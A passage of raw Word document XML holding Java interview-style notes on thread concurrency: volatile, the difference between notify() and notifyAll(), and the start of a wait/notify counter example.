        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Use volatile when you need to ensure that a variable's latest value is visible to all threads, but it doesn't provide mutual exclusion. It is useful for flags or state variables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A23262" w14:textId="44021A18" w:rsidR="00BD73D4" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00BD73D4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:pict w14:anchorId="1FCE2F87">
          <v:rect id="_x0000_i1818" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="313DE1C6" w14:textId="5E27C87A" w:rsidR="00C836C6" w:rsidRPr="00CE4B95" w:rsidRDefault="00C836C6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="263" w:name="_Toc196307743"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">What happens </w:t>
      </w:r>
      <w:r w:rsidR="00B215E7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">if a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>thread call</w:t>
      </w:r>
      <w:r w:rsidR="00B215E7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> notify() instead of notifyAll()?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="263"/>
    </w:p>
    <w:p w14:paraId="1F4B1D40" w14:textId="372B802C" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="005C2C08" w:rsidP="005C2C08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>In</w:t>
      </w:r>
      <w:r w:rsidR="00891EBF" w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Java, when a thread calls notify() or notifyAll() on an object’s monitor (usually within a synchronized block), it notifies one or more threads that are waiting on that object, respectively. However, the behavior of these two methods differs significantly, and understanding the implications is essential for correct multithreading behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FADF346" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Key Differences Between notify() and notifyAll()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5A81CB" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1102"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>notify()</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E323FE1" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1102"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">It wakes up </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>one</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> thread that is waiting on the object’s monitor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C993BF" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1102"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Which thread gets awakened is </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not guaranteed</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and depends on the thread scheduling of the JVM. It could be any thread that is currently in the waiting state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1835EDB7" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1102"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>If multiple threads are waiting, only one thread is notified, and the others will continue waiting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67ED4B76" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1102"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>notifyAll()</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1574E0BC" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1102"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">It wakes up </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> threads that are waiting on the object’s monitor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDE513B" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1102"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Once all the threads are notified, they will compete for the monitor lock and execute as the JVM allows. This is typically used when all waiting threads need to be processed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDF2278" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>What Happens If a Thread Calls notify() Instead of notifyAll()?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613A2DDC"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When a thread calls notify() instead of notifyAll(), it can result in </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>unexpected or inefficient behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, especially in cases where multiple threads are waiting for a condition to be met. Here's what could happen:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFE29B7" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1103"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Potential Starvation</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24930E53" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1103"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>If there are multiple threads waiting and only one thread gets notified, the other threads will stay in the waiting state. If the notified thread does not satisfy the condition, it might go back into the waiting state, and none of the remaining threads will be notified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38994C83" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1103"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This can lead to </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>starvation</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of certain threads (i.e., threads may never get a chance to run).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C190691" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1103"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Incorrect Behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171DE5BC" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1103"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>In scenarios where multiple threads are waiting for a condition (e.g., a producer-consumer scenario), notifying only one thread using notify() might not be sufficient if there are many threads waiting. In such cases, you may want to notify all threads because the condition might have changed in such a way that multiple threads can now proceed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710316EA" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1103"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Using notify() in this situation could cause some threads to wait indefinitely because only one of them will be woken up, and it might not be able to proceed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E930300" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1103"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Inefficient Synchronization</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E6D15F" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1103"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>In cases where all waiting threads should be allowed to proceed, calling notify() instead of notifyAll() can lead to inefficient use of system resources. With notify(), only one thread is notified, and the other threads remain idle while they wait.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FAF019" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example to Illustrate the Difference:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD9A69B"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class SharedResource {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD952A4"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private int count = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E441840" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35630B58"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public synchronized void increment() throws InterruptedException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B6FC5F"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        while (count == 5) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFC9458"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ait();  // Thread waits until the count is less than 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD3A08D"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2AC31DFC"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count++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A622171"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System.out.println("Count incremented to: " + count);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A9BE2C"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notify();  // Notifying a single thread to proceed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F17AD3"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7601A626" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="384FF42B"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public synchronized void decrement() throws InterruptedException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E56F2E8"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hile (count == 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B18D98"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ait();  // Thread waits until the count is greater than 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E91B57E"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66EC823B"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count--;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4CFB29"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System.out.println("Count decremented to: " + count);</w:t>
      </w:r>
    </w:p>
